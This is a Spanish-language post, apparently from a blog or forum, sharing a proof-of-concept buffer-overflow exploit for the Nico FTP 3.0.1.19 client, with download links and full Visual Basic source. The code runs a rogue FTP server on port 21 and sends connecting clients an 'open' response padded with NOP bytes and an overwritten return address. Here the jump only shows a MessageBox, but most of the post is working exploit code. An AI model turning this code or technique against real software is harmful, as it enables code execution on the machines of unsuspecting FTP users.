NOTA : El BUG NO ESTOY DEL TODO SEGURO EN SER EL PRIMERO EN DESCUBRIRLO YA QUE EXISTE OTRO BUG QUE NO ENCONTRE INFORMACION EN ESPAÑOL NI EXPLOIT



El exploit lo que hace es saltar a una direccion(004AB481) en el mismo codigo para mostrar un MessageBox

http://rapidshare.com/files/360325715/Exploit_NicoFTP.rar.html

http://www.2shared.com/file/11930614/41732bad/Exploit_NicoFTP.html

 
 
Const Command = "open "
Const LenExploit = "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<"
 
 
 
Private Sub Form_Load()
Winsock1.LocalPort = 21
Winsock1.Listen
End Sub
 
Private Sub Timer1_Timer()
Label1.Caption = Winsock1.State
 
End Sub
 
Private Sub Timer2_Timer()
Dim Exploit As String
 
If Winsock1.State = 7 Then
Dim i As Integer
For i = 1 To Len(LenExploit)
Exploit = Exploit & Chr(&H90)
 
Next i
 
 
'Chr(&H81) & Chr(&HB4) & Chr(&H4A) = &H81B44A = &H004AB481
Winsock1.SendData Command & Exploit & Chr(&H81) & Chr(&HB4) & Chr(&H4A) & Chr(13) & Chr(10) & Chr(0)
End If
 
If Winsock1.State = 9 Then
Winsock1.Close
Winsock1.Listen
End If
 
 
End Sub
 
Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)
 
If Winsock1.State <> sckClosed Then
Winsock1.Close
End If
 
 
 
Winsock1.Accept requestID
End Sub
 
 
 
 

FUENTE:
http://secmam.blogspot.com/2010/03/bug-nico-ftp-30119.html